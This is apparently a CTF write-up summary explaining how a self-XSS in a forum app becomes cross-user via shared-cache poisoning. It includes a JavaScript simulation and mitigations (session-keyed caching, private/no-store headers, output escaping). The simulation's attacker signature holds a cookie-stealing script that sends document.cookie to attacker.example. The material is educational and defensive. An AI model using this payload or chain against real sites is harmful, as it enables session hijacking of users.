Business CTF 2022: Chaining Self XSS with Cache Poisoning - Felonious Forums
This CTF write-up shows how a nominally low-impact self-XSS in a forum application becomes a real account-compromise issue when it is chained with web cache poisoning. On its own, a self-XSS only runs in the session of the user who planted it. The chain works by getting the attacker's response, including the injected JavaScript, stored by a shared cache whose key does not distinguish between users' sessions, so the cached copy is replayed to other users who request the same URL and the script executes in a victim's browser instead of the attacker's. Once that cross-user replay happens, the payload can exfiltrate the victim's session cookie (provided the cookie is readable from script, i.e. not marked HttpOnly) and enable session hijacking. The technique matters beyond the challenge because it shows how cache behavior alone can upgrade a self-only bug into a broadly exploitable client-side vulnerability: the fix is not just escaping the output, but also making sure personalized responses are never cached under a shared key (vary on the session, or mark them `Cache-Control: private, no-store`).
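To make the chain concrete, here is an added example that models it end to end. It is not code from the write-up or from the Felonious Forums challenge: the user records, the `sid` cookie, the unescaped profile "signature" field used as the XSS sink, the `/profile` path and the `attacker.example` host are all constructed for illustration. It simulates an origin server behind a shared cache, runs the attacker-then-victim request sequence, and then repeats it with each of three mitigations applied separately.

```javascript
// Added example (not the write-up's or the challenge's code): a toy model of how a
// self-XSS becomes cross-user when a shared cache keys a personalized page only on its URL.
// All names (users, sid values, the "signature" field, attacker.example) are constructed.

const users = {
  attacker: { sid: "sid-attacker",
              signature: "<script>location='https://attacker.example/?c='+document.cookie</script>" },
  victim:   { sid: "sid-victim", signature: "Just here for the forums" },
};

const escapeHtml = (s) => s.replace(/[&<>"']/g, (ch) =>
  ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[ch]);

// Origin server: renders /profile for whoever the "sid" cookie identifies.
// `escapeOutput` closes the XSS sink; `markPrivate` tells caches not to store the page.
function makeOrigin({ escapeOutput = false, markPrivate = false } = {}) {
  return function origin(request) {
    const user = Object.values(users).find((u) => u.sid === request.cookies.sid);
    if (!user) return { status: 401, headers: {}, body: "login required" };
    const sig = escapeOutput ? escapeHtml(user.signature) : user.signature;
    const headers = { "content-type": "text/html" };
    if (markPrivate) headers["cache-control"] = "private, no-store";
    return { status: 200, headers, body: `<h1>Profile</h1><div class="sig">${sig}</div>` };
  };
}

// Shared cache in front of the origin. `keyFn` decides which requests count as "the same".
function makeCache(origin, { keyFn, honorCacheControl = false }) {
  const store = new Map();
  return function fetchThrough(request) {
    const key = keyFn(request);
    if (store.has(key)) return { ...store.get(key), fromCache: true };
    const resp = origin(request);
    const cc = resp.headers["cache-control"] || "";
    const storable = resp.status === 200 &&
      !(honorCacheControl && /\b(private|no-store)\b/.test(cc));
    if (storable) store.set(key, resp);
    return { ...resp, fromCache: false };
  };
}

// Unsafe key: the Cookie header is ignored, so one user's page is replayed to everyone.
const keyByPath = (req) => `${req.method} ${req.path}`;
// Safer key: vary on the session so a personalized page is never shared across users.
const keyByPathAndSession = (req) => `${req.method} ${req.path} sid=${req.cookies.sid}`;

// Attack sequence: the attacker loads the page first (seeding the cache), then the victim
// requests the same URL. Returns true if the victim received the attacker's script.
function victimGetsPayload(origin, cacheOpts) {
  const fetchThrough = makeCache(origin, cacheOpts);
  const attackerReq = { method: "GET", path: "/profile", cookies: { sid: users.attacker.sid } };
  const victimReq   = { method: "GET", path: "/profile", cookies: { sid: users.victim.sid } };
  fetchThrough(attackerReq);             // self-XSS: normally only the attacker sees this
  const seen = fetchThrough(victimReq);  // poisoned replay if the cache key is URL-only
  return seen.body.includes("<script>");
}

// Vulnerable stack: URL-only cache key, no Cache-Control, unescaped signature.
const vulnerable = () => victimGetsPayload(makeOrigin(), { keyFn: keyByPath });
// Each mitigation on its own stops the cross-user script execution in this model.
const fixedByKey = () => victimGetsPayload(makeOrigin(), { keyFn: keyByPathAndSession });
const fixedByHeaders = () => victimGetsPayload(makeOrigin({ markPrivate: true }),
  { keyFn: keyByPath, honorCacheControl: true });
const fixedByEscape = () => victimGetsPayload(makeOrigin({ escapeOutput: true }),
  { keyFn: keyByPath });

console.log({ vulnerable: vulnerable(), fixedByKey: fixedByKey(),
  fixedByHeaders: fixedByHeaders(), fixedByEscape: fixedByEscape() });
```

Run it with `node` and `vulnerable` comes back `true` while the three fixed variants come back `false`. Note that `fixedByEscape` only removes the script execution: with a URL-only cache key the victim is still handed the attacker's profile page, so the cache configuration needs fixing regardless of whether the output encoding bug is closed.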
This post is licensed under CC BY 4.0 by the author.